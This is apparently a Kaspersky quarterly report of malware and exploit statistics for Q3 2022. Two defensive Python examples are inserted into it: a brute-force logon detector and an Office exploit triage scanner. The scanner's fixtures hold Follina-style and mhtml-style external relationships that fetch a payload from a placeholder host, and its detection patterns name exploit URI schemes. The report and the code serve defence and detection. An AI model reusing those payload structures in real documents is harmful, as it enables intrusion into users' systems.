
# IT threat evolution in Q3 2022. Non-mobile statistics


* [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>)
* **IT threat evolution in Q3 2022. Non-mobile statistics**
* [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)

_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._

## Quarterly figures

According to Kaspersky Security Network, in Q3 2022:

* Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.
* Web Anti-Virus recognized 251,288,987 unique URLs as malicious.
* Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.
* Ransomware attacks were defeated on the computers of 72,941 unique users.
* Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.

## Financial threats

### Number of users attacked by banking malware

In Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.
_Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_

### TOP 10 banking malware families

| | Name | Verdicts | %* |
|---|---|---|---|
| 1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2 |
| 2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2 |
| 3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0 |
| 4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8 |
| 5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8 |
| 6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.1 |
| 7 | RTM | Trojan-Banker.Win32.RTM | 1.9 |
| 8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4 |
| 9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4 |
| 10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 |

_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._

### Geography of financial malware attacks

**TOP 10 countries and territories by share of attacked users**

| | Country or territory* | %** |
|---|---|---|
| 1 | Turkmenistan | 4.7 |
| 2 | Afghanistan | 4.6 |
| 3 | Paraguay | 2.8 |
| 4 | Tajikistan | 2.8 |
| 5 | Yemen | 2.3 |
| 6 | Sudan | 2.3 |
| 7 | China | 2.0 |
| 8 | Switzerland | 2.0 |
| 9 | Egypt | 1.9 |
| 10 | Venezuela | 1.8 |

_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._
_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._

## Ransomware programs

### Quarterly trends and highlights

The third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leak to the personal initiative of one of their developers rather than to the group being hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community.
As with other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve groups unrelated to LockBit. One example is Bloody/Bl00dy, [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.

Mass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over the SMB protocol and protected only by a weak account password. The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices running a vulnerable version of the Photo Station software. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.

The United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back.

The creators of the little-known AstraLocker and Yashma ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.
### Number of new modifications

In Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. More than 11,000 of those were assigned the verdict Trojan-Ransom.Win32.Crypmod, which took sixth place in our ranking of the most widespread ransomware Trojans.

_Number of new ransomware modifications, Q3 2021 — Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_

### Number of users attacked by ransomware Trojans

In Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.

_Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_

### Geography of attacked users

**TOP 10 countries and territories attacked by ransomware Trojans**

| | Country or territory* | %** |
|---|---|---|
| 1 | Bangladesh | 1.66 |
| 2 | Yemen | 1.30 |
| 3 | South Korea | 0.98 |
| 4 | Taiwan | 0.77 |
| 5 | Mozambique | 0.64 |
| 6 | China | 0.52 |
| 7 | Colombia | 0.43 |
| 8 | Nigeria | 0.40 |
| 9 | Pakistan | 0.39 |
| 10 | Venezuela | 0.32 |

_* Excluded are countries with relatively few Kaspersky users (under 50,000)._
_** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._

### TOP 10 most common families of ransomware Trojans

| | Name | Verdicts* | Percentage of attacked users** |
|---|---|---|---|
| 1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 |
| 2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 |
| 3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 |
| 4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 |
| 5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 |
| 6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 |
| 7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 |
| 8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 |
| 9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 |
| 10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 |

_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data._
_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._

## Miners

### Number of new miner modifications

In Q3 2022, Kaspersky systems detected 153,773 new miner modifications. More than 140,000 of these were found in July and August; combined with June's figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.

_Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_

### Number of users attacked by miners

In Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. A quieter period from late spring through the early fall was followed by another increase in activity.
_Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_

### Geography of miner attacks

**TOP 10 countries and territories attacked by miners**

| | Country or territory* | %** |
|---|---|---|
| 1 | Ethiopia | 2.38 |
| 2 | Kazakhstan | 2.13 |
| 3 | Uzbekistan | 2.01 |
| 4 | Rwanda | 1.93 |
| 5 | Tajikistan | 1.83 |
| 6 | Venezuela | 1.78 |
| 7 | Kyrgyzstan | 1.73 |
| 8 | Mozambique | 1.57 |
| 9 | Tanzania | 1.56 |
| 10 | Ukraine | 1.54 |

_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000)._
_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._

## Vulnerable applications used by criminals during cyberattacks

### Quarterly highlights

Q3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let's begin with Microsoft Windows and some of its components.

Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), the latter two encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write attacker-controlled data to arbitrary memory addresses, which is enough to hijack kernel control flow and elevate privileges on the system.

Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). These allow elevating privileges on the system through a series of manipulations while installing a printer.
Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects the remote procedure call (RPC) runtime and allows an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation. Note that most of the vulnerabilities above are local privilege escalation bugs: the attacker needs an existing foothold on the system before the exploit is of any use, so they typically serve as a second stage after initial access rather than as the entry point.

The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which can be exploited to take advantage of security flaws in the link handler to remotely run commands on the system.

Most of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common.
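Since password brute-forcing against RDP and Microsoft SQL Server tops the network-threat statistics, here is an added example of the detection logic a SOC would run against its own logs. It is not code from the Securelist report or from any Kaspersky product. The log lines are constructed for this example and simplified: one line per failed logon, loosely modelled on Windows Security event 4625 (logon type 10 is RemoteInteractive, i.e. RDP) and on the SQL Server error-log message 18456 ("Login failed for user"). The threshold and window are illustrative defaults, not values from the report.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not real telemetry). Hosts use RFC 5737 documentation ranges.
SAMPLE_LOG = """\
2022-09-14T10:00:01 4625 src=203.0.113.7 user=administrator logon_type=10
2022-09-14T10:00:04 4625 src=203.0.113.7 user=administrator logon_type=10
2022-09-14T10:00:05 4625 src=198.51.100.5 user=jdoe logon_type=10
2022-09-14T10:00:09 4625 src=203.0.113.7 user=admin logon_type=10
2022-09-14T10:00:15 4625 src=203.0.113.7 user=administrator logon_type=10
2022-09-14T10:00:22 4625 src=203.0.113.7 user=admin logon_type=10
2022-09-14T10:00:30 4625 src=203.0.113.7 user=administrator logon_type=10
2022-09-14T10:00:35 4625 src=198.51.100.5 user=jdoe logon_type=10
2022-09-14T10:01:00 18456 src=192.0.2.9 user=sa
2022-09-14T10:01:05 4625 src=198.51.100.5 user=jdoe logon_type=10
2022-09-14T10:01:10 18456 src=192.0.2.9 user=sa
2022-09-14T10:01:20 18456 src=192.0.2.9 user=sa
2022-09-14T10:01:30 18456 src=192.0.2.9 user=sa
2022-09-14T10:01:35 4625 src=198.51.100.5 user=jdoe logon_type=10
2022-09-14T10:01:40 18456 src=192.0.2.9 user=sa
2022-09-14T10:02:05 4625 src=198.51.100.5 user=jdoe logon_type=10
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) (?P<event>4625|18456) "
    r"src=(?P<src>[\d.]+) user=(?P<user>\S+)"
)
# Event id -> service name, as used in the alert.
SERVICE = {"4625": "RDP", "18456": "MSSQL"}


def parse_events(text):
    """Return (timestamp, service, source IP, user) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), SERVICE[m["event"]],
                           m["src"], m["user"]))
    events.sort(key=lambda e: e[0])  # collectors often deliver lines out of order
    return events


def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window detector: one alert per (source, service) the first time
    `threshold` failed logons fall inside a single `window`. The alert lists the
    distinct user names tried, which separates single-account brute force from
    password spraying across many accounts."""
    recent = defaultdict(deque)   # (src, service) -> deque of (ts, user) inside window
    alerts, alerted = [], set()
    for ts, service, src, user in parse_events(text):
        key = (src, service)
        q = recent[key]
        q.append((ts, user))
        while ts - q[0][0] > window:   # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "src": src,
                "service": service,
                "failures": len(q),
                "users": sorted({u for _, u in q}),
                "first_seen": q[0][0].isoformat(),
                "last_seen": ts.isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

On the sample above, 203.0.113.7 (six RDP failures in 30 seconds, two user names) and 192.0.2.9 (five `sa` failures in 40 seconds) raise alerts; 198.51.100.5 never has more than three failures inside any 60-second window and stays quiet. In production, feed the detector from the event log or SQL error log and tune threshold and window per service; an alert on the `sa` account or `administrator` from an external address is a strong signal regardless of count.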
Attempts to exploit network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued.

Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code on the system, in kernel context, by sending a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which in theory allows remote exploitation of a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>), which affects Windows DNS Server and can lead to denial of service if exploited.

Two vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed "ProxyNotShell" in reference to the ProxyShell vulnerabilities, which were patched earlier and share a similar exploitation technique.
Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the flaws to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to extort money from the victim, and so on.

### Vulnerability statistics

In Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections: 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:

* [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code on the system;
* [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files;
* [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as "Follina", which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) to run arbitrary programs on a vulnerable system even in Protected View or when macros are disabled;
* [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.
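As an added example (not code from the Securelist report or from Kaspersky's products), here is a small static triage script for the four Office exploit patterns just listed, the kind of check an analyst runs on an attachment before opening it. It relies on two structural facts about these documents: CVE-2017-0199, CVE-2021-40444 and Follina (CVE-2022-30190) documents all carry an `oleObject` relationship with `TargetMode="External"` that fetches the next stage from a remote URL (CVE-2021-40444 uses the `mhtml:` scheme with the `!x-usc:` trick; the Follina chain hands an `ms-msdt:` URI to MSDT, usually from the fetched HTML rather than from the document itself), while the Equation Editor exploits (CVE-2017-11882, CVE-2018-0802) ship an embedded OLE object that carries an `Equation Native` stream. The sample documents are constructed in memory and the hostnames are placeholders; `scan_ooxml` and `build_sample` are names chosen for this example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# URI schemes abused by Follina (ms-msdt:) and CVE-2021-40444 (mhtml: ... !x-usc:).
SUSPICIOUS_SCHEME = re.compile(r"^\s*(ms-msdt|mhtml|search-ms):", re.IGNORECASE)
# OLE compound files store stream names as UTF-16LE; Equation Editor objects
# (CVE-2017-11882 / CVE-2018-0802) carry an "Equation Native" stream.
EQUATION_NATIVE = "Equation Native".encode("utf-16-le")


def scan_ooxml(data: bytes) -> list:
    """Return human-readable findings for one OOXML (docx/xlsx/pptx) blob."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.endswith(".rels"):
                root = ET.fromstring(z.read(name))
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    target = rel.get("Target", "")
                    external = rel.get("TargetMode", "").lower() == "external"
                    if rel.get("Type") == OLE_REL_TYPE and external:
                        # Remote OLE object: the loader shared by CVE-2017-0199,
                        # CVE-2021-40444 and Follina documents.
                        findings.append(f"{name}: external OLE object -> {target}")
                    if SUSPICIOUS_SCHEME.match(target):
                        findings.append(f"{name}: suspicious URI scheme -> {target}")
            elif "/embeddings/" in name and EQUATION_NATIVE in z.read(name):
                findings.append(f"{name}: embedded Equation Editor object")
    return findings


def build_sample(rels_xml: str, embedding: bytes = b"") -> bytes:
    """Build a minimal docx-like zip in memory (test fixture, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
        if embedding:
            z.writestr("word/embeddings/oleObject1.bin", embedding)
    return buf.getvalue()


RELS_HEAD = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">'
RELS_TAIL = "</Relationships>"

# Benign document: a single internal image relationship.
BENIGN_RELS = RELS_HEAD + (
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/image" Target="media/image1.png"/>'
) + RELS_TAIL

# Follina-style document: oleObject relationship pointing at remote HTML
# (placeholder host in the reserved .invalid TLD).
FOLLINA_RELS = RELS_HEAD + (
    f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" '
    'Target="http://payload.example.invalid/payload.html!" TargetMode="External"/>'
) + RELS_TAIL

# CVE-2021-40444-style document: mhtml: URI with the !x-usc: trick.
MHTML_RELS = RELS_HEAD + (
    f'<Relationship Id="rId3" Type="{OLE_REL_TYPE}" '
    'Target="mhtml:http://payload.example.invalid/word.html!x-usc:'
    'http://payload.example.invalid/word.html" TargetMode="External"/>'
) + RELS_TAIL

# Fake OLE blob: compound-file magic followed by the Equation Editor stream name.
FAKE_EQUATION_OLE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16 + EQUATION_NATIVE


if __name__ == "__main__":
    for label, doc in [("benign", build_sample(BENIGN_RELS)),
                       ("follina", build_sample(FOLLINA_RELS)),
                       ("mhtml", build_sample(MHTML_RELS)),
                       ("eqnedt", build_sample(BENIGN_RELS, FAKE_EQUATION_OLE))]:
        print(label, scan_ooxml(doc) or ["clean"])
```

The scanner is deliberately conservative: an external `oleObject` relationship has almost no legitimate use in mail attachments, so it is a high-confidence indicator, whereas the `ms-msdt:` check only fires on variants that put the URI directly in the document. RTF carriers of the same exploits are not zip containers and need a separate parser.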
_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_

These were followed by exploits that target browsers. Their share amounted to 6%, one percentage point higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:

* [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to a buffer overflow;
* [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), a memory overflow error in the PDF viewing component;
* [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a type confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code inside the sandbox;
* [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component of Chromium-based browsers, which allows escaping the sandbox and running arbitrary commands on the system.

Since many modern browsers are based on Chromium, attackers can often take advantage of shared vulnerabilities to attack other browsers built on the same engine. A series of vulnerabilities were identified in Microsoft Edge. Worth noting are [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application on the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), race condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), an application memory corruption error with similar results.
The Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code on the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a race condition that leads to a subsequent use-after-free, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption.

As you can see from our reports, browsers are an attractive target for cybercriminals, as they are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers usually have to chain several vulnerabilities to work around the protections of modern browsers.

The remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.

## Attacks on macOS

The third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by the North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.
[CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft. The creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3.

In Q3, cybercrooks also began to make use of open-source tools in their attacks. July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework. In addition, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application.
### TOP 20 threats for macOS

| | Verdict | %* |
|---|---|---|
| 1 | AdWare.OSX.Amc.e | 14.77 |
| 2 | AdWare.OSX.Pirrit.ac | 10.45 |
| 3 | AdWare.OSX.Agent.ai | 9.40 |
| 4 | Monitor.OSX.HistGrabber.b | 7.15 |
| 5 | AdWare.OSX.Pirrit.j | 7.10 |
| 6 | AdWare.OSX.Bnodlero.at | 6.09 |
| 7 | AdWare.OSX.Bnodlero.ax | 5.95 |
| 8 | Trojan-Downloader.OSX.Shlayer.a | 5.71 |
| 9 | AdWare.OSX.Pirrit.ae | 5.27 |
| 10 | Trojan-Downloader.OSX.Agent.h | 3.87 |
| 11 | AdWare.OSX.Bnodlero.bg | 3.46 |
| 12 | AdWare.OSX.Pirrit.o | 3.32 |
| 13 | AdWare.OSX.Agent.u | 3.13 |
| 14 | AdWare.OSX.Agent.gen | 2.90 |
| 15 | AdWare.OSX.Pirrit.aa | 2.85 |
| 16 | Backdoor.OSX.Twenbc.e | 2.85 |
| 17 | AdWare.OSX.Ketin.h | 2.82 |
| 18 | AdWare.OSX.Pirrit.gen | 2.69 |
| 19 | Trojan-Downloader.OSX.Lador.a | 2.52 |
| 20 | Downloader.OSX.InstallCore.ak | 2.28 |

_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._

As usual, our TOP 20 ranking of the biggest threats encountered by users of Kaspersky security solutions for macOS was dominated by adware. AdWare.OSX.Amc.e, touted as "Advanced Mac Cleaner," took the top place for the second quarter in a row. This application displays fake system issue messages and offers the paid full version to fix them. Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.

### Geography of threats for macOS

**TOP 10 countries and territories by share of attacked users**

| | Country or territory* | %** |
|---|---|---|
| 1 | France | 1.71 |
| 2 | Canada | 1.70 |
| 3 | Russia | 1.57 |
| 4 | India | 1.53 |
| 5 | United States | 1.52 |
| 6 | Spain | 1.48 |
| 7 | Australia | 1.36 |
| 8 | Italy | 1.35 |
| 9 | Mexico | 1.27 |
| 10 | United Kingdom | 1.24 |

_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._
_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._

France, with 1.71%, was again the most attacked country by share of users.
Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.

## IoT attacks

### IoT threat statistics

In Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.

| Telnet | 75.92% |
|---|---|
| SSH | 24.08% |

_Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_

A majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.

| Telnet | 97.53% |
|---|---|
| SSH | 2.47% |

_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_

**TOP 10 threats delivered to IoT devices via Telnet**

| | Verdict | %* |
|---|---|---|
| 1 | Backdoor.Linux.Mirai.b | 28.67 |
| 2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63 |
| 3 | Backdoor.Linux.Mirai.ba | 11.63 |
| 4 | Backdoor.Linux.Mirai.cw | 10.94 |
| 5 | Backdoor.Linux.Gafgyt.a | 3.69 |
| 6 | Backdoor.Linux.Mirai.ew | 3.49 |
| 7 | Trojan-Downloader.Shell.Agent.p | 2.56 |
| 8 | Backdoor.Linux.Gafgyt.bj | 1.63 |
| 9 | Backdoor.Linux.Mirai.et | 1.17 |
| 10 | Backdoor.Linux.Mirai.ek | 1.08 |

_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._

Detailed IoT-threat statistics are published in the DDoS report for Q3 2022.

## Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages.
Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._

### Countries and territories that serve as sources of web-based attacks: TOP 10

_The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._

